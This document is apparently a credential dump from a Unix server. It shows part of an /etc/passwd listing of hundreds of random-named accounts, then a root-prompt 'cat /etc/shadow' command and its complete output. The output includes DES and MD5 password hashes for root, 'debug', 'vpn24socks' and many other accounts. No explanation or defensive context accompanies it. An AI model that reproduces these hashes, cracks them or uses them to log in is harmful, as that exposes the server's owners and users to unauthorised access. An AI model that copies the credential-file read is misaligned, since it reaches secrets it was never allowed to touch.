DtzoQ2Xw7q:x:1540:1540::/home/SSHUSER:/usr/sbin/nologin tDBq7HfG3r:x:1541:1541::/home/SSHUSER:/usr/sbin/nologin f8cDerX7wf:x:1542:1542::/home/SSHUSER:/usr/sbin/nologin QoTkaCA5hf:x:1543:1543::/home/SSHUSER:/usr/sbin/nologin Lmh9L2R8qz:x:1544:1544::/home/SSHUSER:/usr/sbin/nologin kzgMwiKIDN:x:1545:1545::/home/SSHUSER:/usr/sbin/nologin 6pFUWCUnmw:x:1546:1546::/home/SSHUSER:/usr/sbin/nologin Pgh2JWajwc:x:1547:1547::/home/SSHUSER:/usr/sbin/nologin PKSb4b3iAN:x:1548:1548::/home/SSHUSER:/usr/sbin/nologin 5DeP78tYXf:x:1549:1549::/home/SSHUSER:/usr/sbin/nologin ZDrNQotOat:x:1550:1550::/home/SSHUSER:/usr/sbin/nologin rd5t8jfvnj:x:1551:1551::/home/SSHUSER:/usr/sbin/nologin vuqRa4K55i:x:1552:1552::/home/SSHUSER:/usr/sbin/nologin itMjMX8Zgb:x:1553:1553::/home/SSHUSER:/usr/sbin/nologin MyxPyfxyxX:x:1554:1554::/home/SSHUSER:/usr/sbin/nologin BcLoH5F0R3:x:1555:1555::/home/SSHUSER:/usr/sbin/nologin 9T9jRHvZ7q:x:1556:1556::/home/SSHUSER:/usr/sbin/nologin ienW7EvZzk:x:1557:1557::/home/SSHUSER:/usr/sbin/nologin kdo3z10kOe:x:1558:1558::/home/SSHUSER:/usr/sbin/nologin WX4JFyd3V4:x:1559:1559::/home/SSHUSER:/usr/sbin/nologin PAhJp3OPbl:x:1560:1560::/home/SSHUSER:/usr/sbin/nologin cfmu8MNhEM:x:1561:1561::/home/SSHUSER:/usr/sbin/nologin iyW122H0oe:x:1562:1562::/home/SSHUSER:/usr/sbin/nologin 3YePbBy2tp:x:1563:1563::/home/SSHUSER:/usr/sbin/nologin # cat /etc/shadow root:uOSm9.x7gpWsQ:14915:0:99999:7::: daemon:*:14642:0:99999:7::: bin:*:14642:0:99999:7::: sys:*:14642:0:99999:7::: sync:*:14642:0:99999:7::: games:*:14642:0:99999:7::: man:*:14642:0:99999:7::: lp:*:14642:0:99999:7::: mail:*:14642:0:99999:7::: news:*:14642:0:99999:7::: uucp:*:14642:0:99999:7::: proxy:*:14642:0:99999:7::: www-data:*:14642:0:99999:7::: backup:*:14642:0:99999:7::: list:*:14642:0:99999:7::: irc:*:14642:0:99999:7::: gnats:*:14642:0:99999:7::: nobody:*:14642:0:99999:7::: libuuid:!:14642:0:99999:7::: bind:*:14642:0:99999:7::: fetchmail:*:14642:0:99999:7::: sshd:*:14642:0:99999:7::: stunnel4:!:14642:0:99999:7::: smmta:*:14642:0:99999:7::: smmsp:*:14642:0:99999:7::: USgK1k659d:itB/c13dN/u7E:14738:0:99999:7::14828: vpn24socks:$1$g9C2d1Pg$TYfku0QfqwZzCCrihY5BQ.:14897:0:99999:7::: 2ee2JLMeiD:iteTHaYjXCmVg:14741:0:99999:7::14771: jguv7VJ6ii:itFCIPugyoVGA:14745:0:99999:7::14775: sOxNXOP2PV:itiUb2mQGkMAM:14748:0:99999:7::14776: IlE6hFCCQ9:it8sjuBu2UwmA:14758:0:99999:7::14788: gxCDRFriLl:itATXQT/mvNEM:14759:0:99999:7::14927: BulLYDNolq:it8SLiNmaP0kI:14760:0:99999:7::14790: cEzN80h8BB:itl5alHHHRj/o:14761:0:99999:7::14791: A49RKGrvdB:it.aXsDvAydCw:14761:0:99999:7::14791: 3uUk7DToWo:itIVK64.gWJAA:14761:0:99999:7::14791: 4MMRD3G8gT:it7z/czHZ/4gg:14764:0:99999:7::14794: QIhyvtXwum:it2ATBMSEZyuY:14765:0:99999:7::14795: bX8CG70Z8o:itJijnCruWn6s:14765:0:99999:7::14855: NGHZWVpVuu:itwnfwU18AQZ6:14765:0:99999:7::14855: MkdEe0NgXc:itiOdqfUCvOOY:14765:0:99999:7::14867: VP3ofYe5qa:it17IG/Js9Vck:14767:0:99999:7::14797: s9wnq4iJbL:itF7GdfK4cHwA:14768:0:99999:7::14798: JF23IDOEX0:itjVH5xatvIjg:14769:0:99999:7::14799: GOE9IvxCo8:itUnwzzVvUvfI:14770:0:99999:7::14800: 2mAWybIfou:itxaq4qqSWmrM:14770:0:99999:7::14800: ywLRB9sQG5:it/JoBv/eYT5U:14770:0:99999:7::14800: U5wILkFczX:itS09vevC2cUk:14771:0:99999:7::14801: qU247MmWWp:itGjgxFlOLsNY:14771:0:99999:7::14801: JpE3P8WgBN:itz5J2D3BnylQ:14772:0:99999:7::14802: OTx2pkLemc:itdrcEiHMAcmo:14773:0:99999:7::14803: tLDp1920ug:itrlGlUwCXA2.:14773:0:99999:7::14803: pzSoTppzAu:itYHMFEVKujMQ:14774:0:99999:7::14804: fcz40nnjZr:itrE5RglVeq6I:14775:0:99999:7::14805: 1TEkAllzys:itCa0ysI.zviM:14776:0:99999:7::14806: WMfvkEivY0:itEB014a/919s:14776:0:99999:7::14806: 4Vvq0LAF9r:itQa.hMitwqBk:14780:0:99999:7::14810: QVMgMXxSeK:itjWbRYcqg68.:14781:0:99999:7::14811: dtxSHwZpH3:itylRO//M3ToE:14781:0:99999:7::14811: Uth54wPUPD:itJq7wfSkYO0Y:14781:0:99999:7::14811: eCWEZEQZVq:itQpFlgIXcbIs:14783:0:99999:7::14813: wp6WkrrhkH:itFOBdWM6twuU:14783:0:99999:7::14814: QLGAfXHUAX:it0QHPOluaMyM:14785:0:99999:7::14815: NWPWWWxBnh:itUf75Y/bENEQ:14785:0:99999:7::14815: LY5yDIThxj:itcfUQF1iv2/I:14787:0:99999:7::14817: LvJSd7KRCq:itHhdmnQ5K1BU:14788:0:99999:7::14818: DNlBW8cww2:it34R5ynNPess:14788:0:99999:7::14818: 22JAEReAWb:itYK1kHANDxdk:14789:0:99999:7::14819: 1U7iYfKkZg:itBz2LEk.iv9c:14789:0:99999:7::15149: A9RlGkkBly:it2GU6kR9pzQQ:14791:0:99999:7::14821: ezjCz5tTLo:it4LXhsv8Gp3Y:14792:0:99999:7::14822: CZ298VrwyT:itCaZtRbDIyXc:14793:0:99999:7::14823: DDFFWPh13H:itzt.DXQW5/8Y:14793:0:99999:7::14858: FwKPqLl9HO:itJtQGEkrPt12:14794:0:99999:7::15154: 4GA5FfwFEB:itbSS8sFdc0XI:14795:0:99999:7::14825: 6RyUaunr8w:itprojJIZZK5k:14795:0:99999:7::14825: O2cPtoYJSA:itELh9gttdfwA:14795:0:99999:7::14825: OieOTeMsVT:itmaN6.6K.hks:14795:0:99999:7::14825: nqh2PPsJoX:itxfNQjUZHEPs:14795:0:99999:7::14825: vLymjSZ2PC:it/91D7UOOkPg:14796:0:99999:7::14826: BB22Ob0wRq:itN1e64V2oPNE:14797:0:99999:7::14887: osHYLha9Xa:itTVoqQl2rXro:14798:0:99999:7::14828: Mjs6t1fh7r:ituFJPgjyRlmo:14799:0:99999:7::14829: DEZtQQ9XlX:ithmUxn.OIhQ2:14800:0:99999:7::14830: GIVQTfHrFc:itYXpaa4uuO0A:14800:0:99999:7::14830: 6keWEVe8CF:it4Z4E1cdXWTI:14801:0:99999:7::14831: f4rKlco33u:it340SfG3g5ZQ:14802:0:99999:7::14844: 7iVUdiWpZI:it1tZD4MEeonE:14802:0:99999:7::14832: WBuxr9t5xJ:itppUICuI64vQ:14802:0:99999:7::14832: 9q9ZUnLTQd:itHZZD4CYjEd2:14802:0:99999:7::14832: Aw1GQfhx6F:itypRPeiXHUDw:14802:0:99999:7::14832: uurtXDhjEU:itrLEiUz1FSgs:14803:0:99999:7::14833: G7lfd8zf1h:ithYIaAgjMZy.:14803:0:99999:7::14834: EMY6T7qTGu:itKs8yYfyU7Bs:14803:0:99999:7::14833: IzPTVGc4Yo:it4AQn9hNTDpk:14803:0:99999:7::14833: 4RmVWo7T4v:itI86zNOA452w:14804:0:99999:7::14834: z9VTnI5JJX:itL2OMielYObw:14804:0:99999:7::14834: qF7C1TR0he:ithzxC2YWnZMo:14804:0:99999:7::14834: OxUqFE7v5H:it0ak6/xHcP3g:14805:0:99999:7::14835: QluTWIEQSG:itH4r8I9fzUJg:14805:0:99999:7::14835: APi3yQS9Dt:it49aPUsbfswM:14805:0:99999:7::14835: KscYKlIxxP:itkBdUgq1XVUk:14805:0:99999:7::14835: 4OrVVMvg5b:itsUVdh9jlIKI:14806:0:99999:7::14836: 9q9wWck1iv:itW9jPOWvAS.M:14807:0:99999:7::14837: 7T3MmDDuYA:itcx4CkzJFETM:14807:0:99999:7::14837: 9i3rSA1t3B:it.SYvXlNGEL6:14807:0:99999:7::14837: OG60AiIy32:itQwkvbyk2rbk:14807:0:99999:7::14837: XQlGb5EDEX:it39CL0eAM7eM:14808:0:99999:7::14838: gSPbDrdVM7:it.OYEbMgwySk:14808:0:99999:7::14870: bn1XjaAbBO:ithpu.MOWcN2Q:14808:0:99999:7::14838: eEAGLP58B1:itASzjdyZDpVo:14808:0:99999:7::14868: 19vuUOl1DA:itiI2y7mrWeoI:14809:0:99999:7::14839: GJTBqAX0Po:it1Uu/W3WNcUw:14810:0:99999:7::14840: YlKhbzOzlW:itedPh8uS.GGE:14810:0:99999:7::14840: P1IEuRFxoc:itWvqWDbD7LPs:14811:0:99999:7::14841: M74tz0c6cB:itvzbN7i9gD76:14812:0:99999:7::14842: pxCR5mWYxl:it29eclf7EmX2:14812:0:99999:7::14842: BYBEFkGPOv:itnT9MWIzJSMA:14812:0:99999:7::14842: bLQLndsfG7:itOU5lmCywYyA:14812:0:99999:7::14842: 7RsRZ2UUu4:itJQWHjmDMSBg:14813:0:99999:7::14843: gbWPMY3QUz:itMWiO7Rdw7j.:14814:0:99999:7::14844: 3DPSaYAK0I:itnXdG3B7xJJo:14815:0:99999:7::14870: Mfa9YHsFwm:ittgjSkT2gj4k:14816:0:99999:7::14846: MCdvro0waF:it3nns/B37m8A:14816:0:99999:7::14846: 4qTipZxa3g:it/TEdalbJMfM:14816:0:99999:7::14874: jzJtLApQhG:itsr9y.rbSg4Q:14818:0:99999:7::14848: MfJ1grnWz2:itGx1RoQ6IKB6:14818:0:99999:7::14877: TKTlaudWc6:itPNHr6KpAPRQ:14819:0:99999:7::14849: Pg6UVUT4Zi:itApd4kWtPxgI:14820:0:99999:7::14850: 7KxfsATvUY:it7TTxqh9nyK2:14820:0:99999:7::14850: 1YzAOqKyJU:it6ZiWQAL2wmU:14820:0:99999:7::14850: ArAdFXiTdV:itvOH9eWcd6hE:14820:0:99999:7::14850: Tyt6Mxbjb9:itkMpS8/7LT4E:14822:0:99999:7::14912: p5TdBxcMOd:it5XCnCv7GOWc:14822:0:99999:7::14852: HCj78QJ6bB:itV2E5FPhjv/Q:14823:0:99999:7::14853: ataiqUNkhi:itFF/b/bbv4dg:14823:0:99999:7::14853: BDnc11BaRR:itAgVwadM3n1o:14824:0:99999:7::14854: 0xs05pGnsc:itb2On91sFue2:14825:0:99999:7::14855: 6lCpT6Rtlb:itLieCtWiSNmk:14825:0:99999:7::14855: MZGuvPmcQQ:itwBeYSCWzonc:14825:0:99999:7::14855: S393KhVsS0:it0ImcxR03.Bc:14825:0:99999:7::14825: hePPBhA3Zb:iteURoscPLWpE:14825:0:99999:7::14855: xU33BmPZBt:itkHe9tsySfM2:14826:0:99999:7::14858: 8kTCqMWNer:itlb1jZxpEa4w:14828:0:99999:7::14858: Z9mwX94DwA:it3WSVa8R07ls:14830:0:99999:7::14860: QE70dT7Sk6:it0Tv1gANLfrw:14832:0:99999:7::15011: 3nRGuwyy3O:itRWTUESeEAnM:14832:0:99999:7::14862: 7lHu9x5ahz:itLFhHr4cMgEA:14832:0:99999:7::14862: yQt4twcYHi:it9/qpjACWSpA:14832:0:99999:7::14862: 5QOvATUZRp:itkUCczUilUa6:14833:0:99999:7::14863: qrIJmTNsip:itQn6yP0a1D3w:14834:0:99999:7::14932: 3MD6MyTcBm:itkGQqOqkAd6A:14834:0:99999:7::14864: tX55vN8iBA:itVhqTDrPxB3E:14835:0:99999:7::14865: MUF31iM1WD:it1bqY2btUtgc:14835:0:99999:7::14865: 6I1FTys1aV:it1G8ffMZkwBs:14836:0:99999:7::14926: wH5nC1icK0:itsxFgyt7IG7.:14837:0:99999:7::14837: z9GYUjVR9T:itW2tKlBIbklM:14837:0:99999:7::14842: uiv8RD7GCm:itSRd/dT4W7ig:14837:0:99999:7::14867: debug:$1$yShOv8Qf$hR6RSu48g2kUAOV18q23Q.:14837:0:99999:7::: udewQStk6R:itqzk9aMNRAtI:14837:0:99999:7::14867: YRfpne3P1W:it7MwZ1NA4Qg6:14838:0:99999:7::14868: 2G6ixqigXX:itYHt1qHMyxg6:14838:0:99999:7::14868: FZ6nGPBlnq:itTB9Xib/.Jms:14838:0:99999:7::14868: N4WUxGoeHX:itEmsj0kbt5Ig:14838:0:99999:7::14868: 3qoY48h6od:itzq1YDUTChmo:14839:0:99999:7::14869: 0KltTgDdxs:itjH.XV1RHImM:14839:0:99999:7::14869: KnOIZkAYhv:itB/NLcosNZao:14840:0:99999:7::14870: pduruQrvQw:itiNBdTTqSHXc:14841:0:99999:7::14871: gfPh6U7BSL:itCwYFdL4JCUs:14842:0:99999:7::14872: 5d4PClWw9W:it8p4QD0G52a.:14842:0:99999:7::14872: X3IwwuMhVn:itNC9p4Jw4Sew:14842:0:99999:7::14872: 9lKRF8UVul:itpPmVNnqzz8s:14843:0:99999:7::14875: 7OEkZFXfrj:itW9kD.grdiZc:14844:0:99999:7::14874: XR9kXMus18:itup25xiWxlJE:14844:0:99999:7::14874: LeJdtNDj0s:itu.0zdvPYBqU:14844:0:99999:7::14874: sMdDwKbykL:itUWFJ7x2CEvE:14844:0:99999:7::14874: RLPQ9lCkkg:itSEmJMpmRKuY:14845:0:99999:7::14875: m07JSN8S1t:ithZZB/vxmf9s:14845:0:99999:7::14875: KoW5ucmliR:itbs5gLqLFQ6U:14845:0:99999:7::14875: vxaNuWuV5A:itQ/9L7nfjCGs:14846:0:99999:7::14876: r6cQANOWcM:iteuR8tiYJc0A:14846:0:99999:7::14876: GefhxHzMLB:itbcf7Sdv5haA:14847:0:99999:7::14877: gghzgxMlzK:itv2DXUhR8k.E:14848:0:99999:7::14878: dTECuvvcnY:itjIptA916Ebc:14848:0:99999:7::14878: teamsocks:itt.x7Yyh3o4c:14848:0:99999:7::15706: 2ZzW1TPwek:italJuFQJ5a3s:14850:0:99999:7::14880: 98pASZD7ZL:itxSgbMMIp5Ss:14850:0:99999:7::14880: rgNCfMxMDE:itUv8r76CvnFE:14852:0:99999:7::14942: TPJNO6U7gB:it3nK7o5rGQTs:14854:0:99999:7::14884: ZfQAMBcfd9:itn/Ahnp4SGYI:14855:0:99999:7::14885: DWJLuNgRHq:it7fcSOrx.qzs:14856:0:99999:7::14886: 26PWTAtsMQ:itp0wE97MeJeY:14856:0:99999:7::14886: wiDxLyK5di:itGyNef3zsBUc:14856:0:99999:7::14886: OOueJqB7Ux:itLOQI2IJENTA:14856:0:99999:7::14946: EaDZkcpMhf:itabLuw41OymE:14856:0:99999:7::14886: swj3AHcyct:itgTFah5u7zEE:14857:0:99999:7::14887: tf1x5jgZf7:it5.he.1J8Tos:14857:0:99999:7::15217: fTkJjFodJR:itlImxgGtzX8E:14858:0:99999:7::14888: q8Ospeoqjm:itfK2S6qHfdY.:14858:0:99999:7::14888: atIdo8CMgl:itDJAu0FCjkD6:14858:0:99999:7::14888: AIVtIPpwbI:it./a4jMDch9s:14858:0:99999:7::14888: 83ssqOi2mG:itf5ysL1ik1Uo:14859:0:99999:7::14889: mDhIWzTPpL:itlbdpvX.70XI:14859:0:99999:7::14889: aw1h0yzOXG:it7nEFlm.U1HE:14860:0:99999:7::14890: 8aXdZvgEAL:itHvOP3gWy0Ek:14860:0:99999:7::14890: 7DpjZkkKRH:it8lCum3QfKEE:14861:0:99999:7::14952: AA4KnP2gQo:itYZtCLpMWh.6:14861:0:99999:7::14891: OdJUE9NXz0:itPdSjh4MZGNk:14861:0:99999:7::14891: WRwA7CA595:itk9xrbc96b6k:14862:0:99999:7::14892: UHJXsI3u7T:itvRm6Pm8LxZs:14862:0:99999:7::14896: AfPMi3Orqx:itK3vLE/cImqE:14862:0:99999:7::14892: IIpk9TW4Hy:itjUMQ7TIWFks:14863:0:99999:7::14893: GfXK6QYZvV:itEba4yQ5bD7Y:14863:0:99999:7::14893: O2JLXab4Qb:itCguhLtUWcso:14864:0:99999:7::14894: abobJxNBqT:itPzo69efPDNI:14865:0:99999:7::14895: PAZYQvYMzp:itJXiA.Q6LtCs:14865:0:99999:7::14895: mein:itz93owDvH2ig:14868:0:99999:7::14975: In1AVHseTI:its.B5WuD6CPI:14868:0:99999:7::14898: 1yNGl2LCqo:itfhGvLrzeOro:14869:0:99999:7::14899: UcblLYHagd:itrGN5VJ63iv2:14870:0:99999:7::14908: GXFmqv0v6j:it4egLMyCOPXQ:14870:0:99999:7::14960: eb0MkURFMR:iteVQ0NCSyuz2:14871:0:99999:7::14901: ZF0P5R5HY1:itYKl7wO/tN6w:14871:0:99999:7::14901: raiesY1Uya:it9XdP1qAJmpI:14871:0:99999:7::14961: 6vWXOICD5H:itAlbixHt8.fY:14871:0:99999:7::14901: EHgdxvxbz6:it6FuhzCGg6TA:14871:0:99999:7::14901: A9cAJOMNCY:it57H1zG3qv.Y:14872:0:99999:7::14901: tHx7Nh5Kfp:itaW6Jr4ZZU.A:14874:0:99999:7::14979: cvs7ZHnMch:itqel0UM7hH0k:14874:0:99999:7::14904: R2XHmC62ZS:itSJbO1UjIVk.:14874:0:99999:7::14904: OthdQ1Nmh5:itHAEGeiEMFhc:14874:0:99999:7::14905: bhUizLPv0M:itHrknSzaql8U:14875:0:99999:7::14905: FqBNIU3BXX:itL7IoJ8HGtjQ:14875:0:99999:7::14905: cYuowtqfqp:it7vPDLMFamNU:14877:0:99999:7::14913: ohLtOJoye9:itDe3UkvVMw/o:14877:0:99999:7::14967: 0xlfaHuCkh:itgwvKix98Szs:14879:0:99999:7::14909: 9oaRxjmjhy:itG4hyGTxFl9U:14881:0:99999:7::14911: 8YNxD3ah6D:itg0cQ4Ya.K2A:14881:0:99999:7::14911: vd8oJtJgZr:itkGNuz.DvpB.:14883:0:99999:7::14913: NwIUjcCYZG:itn7cOK0MxTPU:14884:0:99999:7::14914: 4nduuzyTQx:itmTdvrcDqztk:14885:0:99999:7::14915: 9qAqHLtLBx:it1RA5I5xwmyo:14886:0:99999:7::14939: tuy9erQgxJ:itz9g1V7Y1Vog:14886:0:99999:7::14916: GMunVltQvi:itlZMoR4eis5Q:14887:0:99999:7::14917: sqYWjLaKXf:itaBZ/6eFpuME:14887:0:99999:7::14917: ymLHzXSVjD:itiepJpQGPLR2:14888:0:99999:7::14918: cG6fOsmfgT:itVe1Sv269.cE:14888:0:99999:7::14918: Xv02xz1TQc:itNvLoD4b2F2U:14888:0:99999:7::14918: 13rRlbMsXc:itBiYQEEILlTA:14889:0:99999:7::14919: o1NbEhdi1P:it5mVEaFWNf1.:14892:0:99999:7::14922: SvOn61Ck0K:itTHDnZHL3bH6:14893:0:99999:7::14923: LykwDkKp22:itk3nH54N5/lA:14894:0:99999:7::14924: gDFHnIx6gq:itCJAnpVw.1oE:14894:0:99999:7::14929: BQBra5cl9R:itxMiTR8/w.HU:14894:0:99999:7::14953: 4DaHNYAOXR:it/K.0bHmCxBM:14894:0:99999:7::14924: mybkiYHe4L:itHs/OAKJg9PA:14895:0:99999:7::14935: EZPpg2A55v:itUuxKhoP1VMI:14895:0:99999:7::14925: ZtLdtMOxjz:itvFAdL7qAoAs:14896:0:99999:7::15256: zyDY1v3Ifs:itxQpXl2lf5sw:14897:0:99999:7::14927: vk9rnSCr7X:itjnkjv6.SGWY:14897:0:99999:7::14927: nBeRUhO19Z:itPauEauIQk66:14897:0:99999:7::14927: TeXbvEj3oJ:itr2mNVe6XTuo:14898:0:99999:7::14928: 2Fr6Xq4WyM:it3/yboYrUhVg:14898:0:99999:7::14928: yZsxPqnHdR:itabo7ALxf5rQ:14898:0:99999:7::14928: uQ4lOfB4g0:it/PdCIWid8A6:14898:0:99999:7::14988: tMOYcIGsBO:itPslV9tgLazM:14899:0:99999:7::14929: rbcBkgkMCF:itdT/Uyv7HH.c:14899:0:99999:7::14989: r0FjhxSADo:itSltUoI6eVvI:14899:0:99999:7::14929: 88rM31v2oJ:itwg7qhCbYMag:14899:0:99999:7::14929: d3rdsSAt5s:itWSsOAmAXv/s:14900:0:99999:7::14990: frpOFX7CGJ:ituk9m0heMvJ.:14900:0:99999:7::14930: DN4SdAwDUX:itqnCyrFKN/gM:14900:0:99999:7::14930: SWsT6SYBW0:itv7UN0iZGIDo:14901:0:99999:7::14931: mqdlYki3Bu:itoLRPE/V.0qY:14901:0:99999:7::14931: Kf6hkNRFbt:itMMt7WyGBLmY:14902:0:99999:7::14932: VRKabwxsRz:ithk9weHHtqcc:14903:0:99999:7::14933: W149pluZd9:itx/z6pbrhv3I:14903:0:99999:7::14933: UzPuS4CkgJ:itoICMixQ6M8Q:14904:0:99999:7::14934: UsGU5GLZmf:it7aNFj10DUTs:14904:0:99999:7::14934: r4xLEdMjeu:itHsIkGueCPbk:14906:0:99999:7::14936: lutZaKA8pP:itc61fNMFA/3E:14907:0:99999:7::14936: usDgH6KNsm:itd06qFZIEABM:14907:0:99999:7::14937: CMSc3fnm0o:itI3zX6jizp9o:14907:0:99999:7::14937: vYwuL6Uwia:itcM5h0kqE6Ow:14908:0:99999:7::14938: yaSgVmndrd:it3y5K4Adi7w6:14909:0:99999:7::14939: dfvW2pna2L:itINr2NMjgQpM:14910:0:99999:7::14940: ng3LKLliu1:it7C53g6Lz48A:14912:0:99999:7::14942: 8SVb2iLNbA:itOjHA6.KhcCk:14912:0:99999:7::14942: 3aiHc3W1co:itZc.Y8xjdHo6:14913:0:99999:7::14942: mON9q5Awho:itk.QmqSq0R9I:14913:0:99999:7::14943: FRXf5cUHNA:itkv83lbiIlDQ:14913:0:99999:7::14943: X2w1wWC8cc:itAZHmcDJATPY:14914:0:99999:7::14944: KbZzI1EGD7:itQYRLQgetcXo:14914:0:99999:7::14944: vwX6HwC8Lh:itIBgY/SDaCf2:14914:0:99999:7::14944: YbDmrQ3uHX:itwHmpepzmsyo:14914:0:99999:7::14944: XwrlqzZcqt:itUzpgEXgBeQY:14914:0:99999:7::14944: Zr5u4mLaor:itfloQkXhD5u6:14915:0:99999:7::14945: yRkX9kmf4d:it8vky1.FP1v.:14915:0:99999:7::14945: VPPl3s7YUL:itiEkuDw5DI7g:14916:0:99999:7::14946: OTgrnEWUwc:itOt0S/uMUf4M:14916:0:99999:7::14946: G0OREuDm37:it3eS6p4sq3Zc:14916:0:99999:7::14946: CQyjF4u7CS:itlt3wTyLL1mY:14916:0:99999:7::14946: XwU6xeJKMx:it/6xa8WMPDh.:14917:0:99999:7::14946: aklcI4G2Hr:itznhpJlcPCLE:14917:0:99999:7::14947: mT7JPIqVuf:itw4vdCKM5hh6:14917:0:99999:7::14947: gsZxRf05sx:it5HQlC6kFh4k:14917:0:99999:7::14947: v716hX8oaW:itEqiR8DNv1qA:14919:0:99999:7::14949: Mmh3M4oP0v:itOBibBZTmXD6:14920:0:99999:7::14950: ctV3NEzitO:itBbFVXGBG4BU:14920:0:99999:7::14950: wKer3VQNa8:itnDVU6wdMvG.:14921:0:99999:7::14951: 76BuKJAIQs:itQPcXWud8yfg:14921:0:99999:7::14951: k1dO6lfMNd:it90nC0giFbtw:14922:0:99999:7::14952: I6J3JHUqC1:it/srYUBNHo9M:14922:0:99999:7::14952: GYoFHeDm0z:itBQLqu6UxphI:14922:0:99999:7::14952: 72YV5GHBVx:itQ8ASN1Cpbfk:14923:0:99999:7::14953: G71wfQEPoC:itVuq/dID19J6:14924:0:99999:7::14953: HgcCrXDKen:itKN1JIcX0nBw:14924:0:99999:7::14954: gbzSM7ywwW:itT7p0thywHrI:14925:0:99999:7::14954: dfJJwbDOaG:it8swpmidw2XI:14925:0:99999:7::15015: 4Saf8LwCcR:it9dSQLwlJtIs:14927:0:99999:7::14957: 1eeUWOlK9E:itzm7AcIRfnxY:14928:0:99999:7::14987: Cll4KDM0W3:ita3TIkuFg1/2:14929:0:99999:7::14958: OJAEWyDwCI:itqAL74wVHS9w:14929:0:99999:7::15019: q1iyUEbI5V:itqyIpWotaOKY:14930:0:99999:7::15020: 2N1Uo47Mlg:itxcvxQxkmIJw:14931:0:99999:7::14961: ruVtSN24pr:it3hysvh0JWzg:14932:0:99999:7::14962: zJltMD4mG9:itTv938Zg94SM:14934:0:99999:7::14964: WkUUS9RQf0:it.o2Ii05q/rQ:14934:0:99999:7::14964: bWauNdcsMn:itRPpz0Y9lxlg:14934:0:99999:7::14994: S5UKpRwg51:itNLqhJ7Hekt2:14934:0:99999:7::14964: stFt5RwE33:itIYMTiTEIJFA:14935:0:99999:7::14965: OCUbNto6Bg:itwtuO08u6Whk:14935:0:99999:7::14965: eIxatCSG1U:itZchcu.o/waE:14935:0:99999:7::14965: zXcXCYaIpo:it7JduWDCGa7I:14936:0:99999:7::14966: RBNgJIRt49:itHHvqlfsenFs:14936:0:99999:7::14966: niSxFcVo6S:itxdORWkQMuLU:14936:0:99999:7::14966: Uxx9MvILLz:itonzxA2QqSCo:14937:0:99999:7::14967: klYUlzI7cK:it5P8KkyhBUx.:14938:0:99999:7::14968: 6m9Y1QaKr3:itdviqsn/UOgM:14938:0:99999:7::14968: lVXZHCarqJ:ittqGaCR7CVzY:14938:0:99999:7::14968: 4GWL9WXzxF:itmpwb3peAPso:14938:0:99999:7::14968: JxaTdAV8Rw:itJeetI8t0THk:14938:0:99999:7::14969: 8P7jKJ2Nlh:itcCo7MW2z5c2:14939:0:99999:7::14969: vkE7Afv1aW:itxj1CCnY0KVU:14939:0:99999:7::14969: 2Er5XcDGWA:itVQQjFaoLsVs:14939:0:99999:7::14969: qwBUev5nEp:ityFIjDrBhcMY:14939:0:99999:7::14970: muIspwxptl:itGdEXkF3KasY:14939:0:99999:7::14970: e5yhvJdeTw:itcISq4222ADM:14940:0:99999:7::14970: XUxzr4xMlT:itxh06MdAbfAc:14940:0:99999:7::15030: va20H8Ol9R:itGRrgpip6fho:14940:0:99999:7::14970: qsAbm8ZMyg:it3Ob3nUJuqU.:14940:0:99999:7::14970: 9An1Ctk2Qa:it2SEn0lMti9k:14940:0:99999:7::14970: Ey5cDS72xR:it6G5reVhlop2:14940:0:99999:7::14970: uCUqoIdGPa:itZuCKn5tD7XE:14941:0:99999:7::14971: N6fG120epq:itVuvFFxaDk8E:14942:0:99999:7::14972: gV0gXSFPQ8:itwtoSkg28amA:14942:0:99999:7::14972: FvxPhU3XUz:itFgdFZMSk67A:14942:0:99999:7::14972: iYoWJEuIeo:itPSTarGMLfTY:14942:0:99999:7::14972: ybLYgoCPNG:itjTsMk3pE7e2:14944:0:99999:7::14974: Z6pSiUldwy:ityDkEl8UvQc6:14944:0:99999:7::14974: TkRcTTkRSF:itlk29O.cDvaE:14944:0:99999:7::14974: wHgs7nrMld:it9XlfjywiXy6:14944:0:99999:7::14974: nUYfzYpR4G:itvgu.6SeYDs6:14945:0:99999:7::14975: 8tEhjjRlAC:ithIZGhH1YWGs:14945:0:99999:7::14975: JpChWSSU54:itmC7n8H/IzOI:14946:0:99999:7::14976: EnwaHzdt35:itW5rIFvNIESI:14947:0:99999:7::14977: juTd17x1Nc:itdIXw1efcit2:14947:0:99999:7::14977: TOTQ91BEwS:itETt4OL8daUg:14947:0:99999:7::14977: 6UTA6cTgc2:it/jPTOoUX7RU:14947:0:99999:7::14977: 93EP0GUfGC:itjZCu2VpVTto:14947:0:99999:7::14977: N66NJ15WGg:itvfxHbWSpAGs:14948:0:99999:7::14978: yXmWg290xo:itd6FNm6EstQo:14948:0:99999:7::14978: rcc6AHS1Jg:itaW/avCpeX7I:14949:0:99999:7::14979: zXMmeDGbqP:itbKfASBg5kjQ:14949:0:99999:7::14979: 7tdzW87F9R:it59iCPlIQ2nI:14949:0:99999:7::14979: dpswkJLMwG:itq8CorTAKvbQ:14949:0:99999:7::14979: azsvod1Qyg:itVYBbnLQOXvs:14950:0:99999:7::14980: 72ju0LjHvy:it1M93rvoYWOs:14950:0:99999:7::14980: 73yatKHdOE:itgExui2oxI6k:14951:0:99999:7::14985: UWC2JU92e0:itqqXARCLiWbI:14951:0:99999:7::14981: i1BmroAIeM:itLVHBV2drUzk:14951:0:99999:7::14981: 8sAlXL7Ibr:it64Q2stSnBHA:14953:0:99999:7::14983: kk2M3z5gcp:itBHe6tqX.3XA:14953:0:99999:7::14983: 9cK5xC48nV:itl87NEjGEK2w:14954:0:99999:7::14984: SBAetxCLTy:itnnHODH7U6ss:14954:0:99999:7::14984: 8iZ9BfefaC:itqzc7PIHyg9U:14955:0:99999:7::14985: D73JHDlBCn:it5HRy53l43Y6:14955:0:99999:7::14985: OkpQWghNPU:it./ezuDx/YQE:14956:0:99999:7::14986: gUADWitYGX:it/KOoOhBksMA:14956:0:99999:7::14986: DaGvQaxltT:itLrqA5G31PN2:14956:0:99999:7::14986: pBw5St2oIK:it553jDzNAPfc:14956:0:99999:7::14986: f37WEzjkBK:itwnTkJDchqME:14956:0:99999:7::14986: 23101kMksS:itGlGqE/KXM32:14956:0:99999:7::14986: OmXdWCH5Fq:it1RlH2X7DVAM:14957:0:99999:7::14987: 6HRKiqn5AS:it1T38X6cuM6c:14957:0:99999:7::14987: p8aQLoUmKx:itrg.SUskuxyg:14957:0:99999:7::14987: 31YimlYNtc:itpkbpgDGcZ.s:14957:0:99999:7::14987: P6q1AGVRjm:itkyYcDlznPYE:14958:0:99999:7::14988: 